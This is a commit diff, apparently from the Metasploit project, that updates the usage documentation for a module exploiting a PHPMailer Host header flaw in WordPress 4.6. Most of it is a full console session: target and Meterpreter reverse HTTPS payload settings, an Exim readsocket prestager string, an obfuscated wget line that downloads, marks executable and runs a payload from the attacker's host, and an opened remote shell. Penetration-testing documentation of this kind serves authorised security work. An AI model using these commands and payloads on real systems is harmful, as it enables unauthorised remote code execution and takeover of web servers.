Update doc with new usage
Also kick version down to 4.6, since I wasn't using the tag originally.bug/bundler_fix
William Vu
parent
5fd6cb0890
commit
8021b209ba
|
|
@ -29,34 +29,31 @@ You should see the Exim prestager commands being sent to the target.
|
|||
|
||||
## Usage
|
||||
|
||||
Please set the payload options. Some sane defaults are set, but you'll
|
||||
want to be as specific as possible.
|
||||
|
||||
```
|
||||
msf > use exploit/unix/webapp/wp_phpmailer_host_header
|
||||
msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.152
|
||||
rhost => 192.168.33.152
|
||||
msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.135
|
||||
rhost => 192.168.33.135
|
||||
msf exploit(wp_phpmailer_host_header) > set targeturi /wordpress-4.6
|
||||
targeturi => /wordpress-4.6
|
||||
msf exploit(wp_phpmailer_host_header) > set payload linux/x64/meterpreter_reverse_https
|
||||
payload => linux/x64/meterpreter_reverse_https
|
||||
msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1
|
||||
msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1
|
||||
lhost => 192.168.33.1
|
||||
msf exploit(wp_phpmailer_host_header) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(wp_phpmailer_host_header) > run
|
||||
|
||||
[*] Started HTTPS reverse handler on https://192.168.33.1:8443
|
||||
[*] WordPress 4.7 installed at http://192.168.33.152/wordpress-4.6
|
||||
[*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6
|
||||
[*] Generating wget command stager
|
||||
[*] Using URL: http://0.0.0.0:8080/gzayjqwr
|
||||
[*] Local IP: http://192.168.1.7:8080/gzayjqwr
|
||||
[*] Using URL: http://0.0.0.0:8080/gdydmrcr
|
||||
[*] Local IP: http://192.168.1.7:8080/gdydmrcr
|
||||
[*] Generating and sending Exim prestager
|
||||
[*] Sending /bin/sh -c ${reduce{get /gzayjqwr http/1.0}{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{$item$value$value}}}}}}
|
||||
[*] https://192.168.33.1:8443 handling request from 192.168.33.152; (UUID: bwm9z08k) Redirecting stageless connection from /Dbyg6-yOlTQo9i70ceSG0wDDy1JAZjOS5ToQyoXw4zXBnF with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
|
||||
[*] https://192.168.33.1:8443 handling request from 192.168.33.152; (UUID: bwm9z08k) Attaching orphaned/stageless session...
|
||||
[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.152:35138) at 2017-05-10 01:07:35 -0500
|
||||
[*] Sending /bin/rm -f /tmp/ovcixpnf
|
||||
[*] Sending /bin/sh -c ${reduce{get /gdydmrcr http/1.0}{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{$item$value$value}}}}}}
|
||||
[+] Sending wget${IFS}-qO${IFS}/tmp/kmbrvask${IFS}http://192.168.33.1:8080/gdydmrcr;chmod${IFS}+x${IFS}/tmp/kmbrvask;/tmp/kmbrvask;rm${IFS}-f${IFS}/tmp/kmbrvask
|
||||
[+] Sending payload linux/x64/meterpreter_reverse_https
|
||||
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: kavaks2e) Redirecting stageless connection from /z1Br4gDetykqSyxJc1FJDwUxRwi0zlaU3n8a4qzqQL0car3RRVt6pALb6kN5pFHhGyIHhgaEWcUYZqRQooYIhJarLi5v0 with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
|
||||
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: kavaks2e) Attaching orphaned/stageless session...
|
||||
[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:35848) at 2017-05-15 21:26:17 -0500
|
||||
[*] Sending /bin/rm -f /tmp/kmbrvask
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter >
|
||||
|
|
|
|||
Loading…
Reference in New Issue